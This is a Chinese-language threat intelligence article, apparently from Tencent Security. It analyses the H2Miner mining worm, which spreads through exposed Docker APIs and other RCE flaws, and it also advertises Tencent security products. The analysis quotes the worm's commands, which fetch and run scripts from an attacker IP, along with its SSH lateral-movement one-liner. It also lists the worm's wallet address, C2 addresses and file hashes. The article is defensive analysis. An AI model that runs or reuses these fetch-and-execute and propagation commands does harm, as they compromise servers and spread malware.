产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御验证码
T-Sec 天御文本内容安全
T-Sec 天御视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→
解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
新闻中心
威胁研究
合作伙伴
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云

威胁研究

正文

Linux服务器遭遇挖矿蠕虫攻击，已有数千台服务器中招

2020-07-30 10:52:08

腾讯安全威胁情报中心捕获H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络，已被发现通过多个高危漏洞入侵Linux系统，并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心预估已有数千台服务器中招，腾讯安全专家建议相关企业尽快排查服务器被入侵的情况，及时清除H2Miner挖矿蠕虫病毒。

一、概述

腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利，横向扫描扩大攻击面并维持与远程服务器（C2）通信，令服务器变成黑客控制的肉鸡。同时，具有卸载云服务器安全软件、删除云服务器镜像的能力，会给企业云服务器安全带来严重影响。

H2Miner挖矿蠕虫利用的高危漏洞包括：

Redis未授权RCE；

Solr dataimport RCE(CVE-2019-0193)；

Hadoop Yarn REST API未授权RCE(CVE-2017-15718)；

Docker Remote API未授权RCE；

ThinkPHP5 RCE；

Confluence 未授权RCE(CVE-2019-3396)；

SaltStack RCE（CVE-2020-11651）

等多个Web应用漏洞。

此次H2Miner变种更新了C2服务器地址，在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息，并利用搜索得到的userlist、hostlist、keylist、sshports进行组合尝试爆破登陆，从而扩大其攻击范围。

腾讯安全系列产品已针对H2Miner挖矿蠕虫病毒应急响应，建议相关企业参考如下清单加以排查：

应用

场景

安全产品

解决方案

威

胁

情

报

腾讯T-Sec

威胁情报云查服务

（SaaS）

1）H2Miner黑产团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1）H2Miner黑产团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

（Cloud Firewall，CFW）

基于网络流量进行威胁检测与主动拦截，已支持：

1）H2Miner关联的IOCs已支持识别检测；

2）H2Miner与C2服务器通信协议已支持检测；

有关云防火墙的更多信息，可参考：
https://cloud.tencent.com/product/cfw

腾讯T-Sec 漏洞扫描服务

（Cloud Workload Protection，CWP）

腾讯T-Sec漏洞扫描服务支持自动探测企业网络资产是否存在H2Miner黑产团伙所利用的高危漏洞，并指导修复。

更多信息可参考：

https://cloud.tencent.com/product/vss

腾讯T-Sec 主机安全

（腾讯云镜，Cloud Workload Protection，CWP）

1）腾讯云镜已支持查杀H2Miner相关木马程序；

2）腾讯云镜已支持以下漏洞检测：

Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193) ；Confluence 未授权RCE(CVE-2019-3396)漏洞；

ThinkPHP远程代码执行漏洞；SaltStack远程命令执行漏洞(CVE-2020-11651)。

腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

（腾讯御界）

1）已支持通过协议检测H2Miner木马与服务器的网络通信；

2）已支持以下漏洞利用的检测：

SaltStack远程命令执行漏洞(CVE-2020-11651)

Confluence未授权远程代码执行漏洞(CVE-2019-3396)

ThinkPHP远程代码执行漏洞

Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193)

关于T-Sec高级威胁检测系统的更多信息，可参考：

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统（御点）

1）可查杀H2Miner团伙入侵释放的木马程序；

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html

更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

Docker是一个开源的应用容器引擎，开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。Docker swarm 由docker官方提供，是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展。使用docker swarm的时候，管理的docker 节点上会开放一个TCP端口2375（或2376）。

攻击者利用未受保护的开放Docker API端口进行攻击，并执行恶意命令：

wget -q -O – http[:]//93.189.43.3/d.sh | sh

d.sh执行以下操作：

1. 禁用SELINUX并清除系统日志：echo SELINUX=disabled >/etc/selinux/config；

2. 卸载阿里云骑士和腾讯云镜；

3. 清除竞品挖矿木马；

4. 杀死正在运行的恶意Docker容器并删除它们的映像；

5. 下载恶意程序“kinsing”并运行；

6. 通过crontab定时任务每分钟下载和执行shell脚本；

7. 删除竞品挖矿木马的crontab定时任务。

下载得到的kinsing采用Golang编写，被编译为Linux平台可执行程序，主要有以下功能：

1.下载文件并执行；

2.启动和维持挖矿程序；

3.与C&C服务器通信，接收并执行远程命令；

3.利用masscan对外扫描；

4.针对redis服务进行爆破攻击；

5.下载shell脚本http[:]//93.189.43.3/spre.sh，以进行横向移动。

受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信，其中肉鸡的信息在http头部中标识。

Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi，然后启动连接矿池xmr-eu1.nanopool.org挖矿，配置中使用门罗币钱包为：

46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

挖矿使用矿池和钱包与腾讯安全此前捕获到的版本(H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿，已获利370万元https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q)中使用的相同。

横向移动

Spre.sh是用于在网络中横向传播H2Miner的shell脚本。为了发现攻击目标并找与其相对应的身份验证的信息，脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。

利用收集到的信息，恶意脚本尝试通过SSH连接到每个主机，使用每个可能的用户和密钥组合进行爆破登陆，以便在网络中的其他主机或容器上下载和运行shell脚本Spr.sh，spr.sh与最初攻击时的d.sh相同。

以下SSH命令用于在网络中传播H2Miner：

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"

三、手动清除H2Miner建议：

1、查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程，将其kill掉并删除对应的文件；

2、查找crontab任务中包含“195.3.146.118”的相关项并删除。

IOCs

195.3.146.118

142.44.191.122

185.92.74.42

217.12.221.244

93.189.43.3

185.154.53.140

Md5

kdevtmpfsi	8c6681daba966addd295ad89bf5146af
kinsing	52ca5bc47c84a748d2b349871331d36a
a.sh	e3af308c4a4130dd77dc5772d801ebab
cron.sh	bd405b37e69799492a58a50f5efc2725
d.sh	be17040e1a4eaf7e2df8c0273ff2dfd2
ex.sh	7f469ccecbf9d0573f0efd456e8e63a7
h2.sh	1b34c5bb3a06c4439b5da77c49f14cf7
j.sh	41640173ddb6a207612ee052b48dd8be
lf.sh	bac660c7aa23f4fda6c699c75b4b89f1
p.sh	e040303652c05dbf6469c9c3ce68031a
pa.sh	18dc6621299b855793bdeaad8ef5af23
s.sh	1c489a326a4d37fbf02680bbd6f38b4f
spr.sh	255779cf6134f3ac5133f04868e3956c
spre.sh	639d87d54aa57371cc0bf82409503311
t.sh	ae9017bbeac57bc4de1ac5f59d59c519
tf.sh	831093a5a825ab096c2fc73a7a52bbf1
al.sh	d06e2a3f52043c3a3c3ecf1f406b8241